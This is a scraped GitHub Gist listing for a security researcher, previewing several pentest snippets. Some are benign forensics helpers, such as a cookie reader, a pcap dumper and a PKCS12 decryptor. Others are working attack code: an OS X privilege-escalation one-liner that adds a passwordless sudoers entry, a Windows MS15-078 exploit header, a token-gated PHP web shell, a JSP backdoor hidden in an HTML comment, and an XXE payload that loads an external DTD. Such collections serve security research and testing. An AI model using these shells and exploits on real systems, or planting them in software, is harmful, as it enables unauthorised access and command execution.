Skip to content

Instantly share code, notes, and snippets.

sh1n0b1

  • Bishop Fox
Block or report user

Report or block sh1n0b1

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@sh1n0b1
sh1n0b1 / p12decrypt.php
Created Sep 30, 2015
Decrypt strings encrypted by PKCS12 keys
View p12decrypt.php
<?php
$p12cert = array();
$file = '[PATH]]';
$c = file_get_contents($file);
if (openssl_pkcs12_read($c, $p12cert, '[REDACTED]') )
{
$pkey = $p12cert['pkey']; //private key
$cert = $p12cert['cert']; //public key
//decrypt the encrypted parameter value
@sh1n0b1
sh1n0b1 / dump.pl
Created Sep 17, 2015
pcap SSL packet dump for Wireshark to decrypt - https://supportforums.cisco.com/blog/154046
View dump.pl
#!/usr/bin/perl
#Author: Michal Garcarz @ cisco.com
#Date: 15.01.2013
use Net::Frame::Simple;
use Net::Frame::Dump::Offline;
use Net::Frame::Layer::TCP;
use Net::Frame::Layer;
use Net::Frame::Layer::IPv4;
View ecryptfs2john.py
#!/usr/bin/env python
# Helper script for cracking eCryptfs.
#
# Refer to "ecryptfs-utils_104.orig.tar.gz" in case of doubt.
#
# This software is Copyright (c) 2014 Dhiru Kholia <dhiru.kholia at gmail.com> and
# Copyright (c) 2015, NagraVision <sylvain.pelissier at nagra.com>
# and it is hereby released to the general public under the following terms:
#
View BinaryCookieReader.py
#*******************************************************************************#
# BinaryCookieReader: Written By Satishb3 (http://www.securitylearn.net) #
# #
# For any bug fixes contact me: satishb3@securitylearn.net #
# #
# Usage: Python BinaryCookieReader.py Cookie.Binarycookies-FilePath #
# #
# Safari browser and iOS applications store the persistent cookies in a binary #
# file names Cookies.binarycookies.BinaryCookieReader is used to dump all the #
# cookies from the binary Cookies.binarycookies file. #
@sh1n0b1
sh1n0b1 / escalate.sh
Created Jul 25, 2015
OS X 10.10 DYLD_PRINT_TO_FILE Local Privilege Escalation Vulnerability
View escalate.sh
# It should work for OS X 10.10-10.10.4
echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
@sh1n0b1
sh1n0b1 / elevator.c
Created Jul 24, 2015
Windows Open Type ‘atmfd.dll’ Privilege Escalation MS15-078
View elevator.c
#include <stdio.h>
#include <string.h>
#include "lib.h"
#include <Wininet.h>
//#include "starter.h"
//include OTF
#include "font.h" // foofont is fetched from loader config struct
//#include "cert.h"
View php_shell.php
<?php
//$allowedToken = "509F7BA70C680DDAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
$allowedToken = "<REPLACE_WITH_SOME_RANDOM_LONG_STRING>";
$token = $_GET['token'];
if ($token == $allowedToken){
echo system($_GET['cmd']);
}else{
header("HTTP/1.0 404 Not Found");
@sh1n0b1
sh1n0b1 / linuxprivchecker.py
Created Jul 13, 2015
linuxprivchecker.py -- a Linux Privilege Escalation Check Script
View linuxprivchecker.py
#!/usr/env python
###############################################################################################################
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
##-------------------------------------------------------------------------------------------------------------
## [Details]:
## This script is intended to be executed locally on a Linux box to enumerate basic system info and
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text
## passwords and applicable exploits.
View jsp_backdoor.jsp
<html>
<head>
<!-- <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<br />"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null )
{ out.println(disr); disr = dis.readLine(); } } %>
-->
</head>
<body>
</body>
</html>
@sh1n0b1
sh1n0b1 / XXE.php
Last active Jul 4, 2017
XML Enternal Entity Injection
View XXE.php
<?php
$xml_data ='<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE roottage [
<!ENTITY % dtd SYSTEM "http://<IP_ADDRESS>">
%dtd;]>';
//<!ENTITY xxe SYSTEM "http://target/">]>
$URL = "https://target/";
$ch = curl_init($URL);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: text/html'));
You can’t perform that action at this time.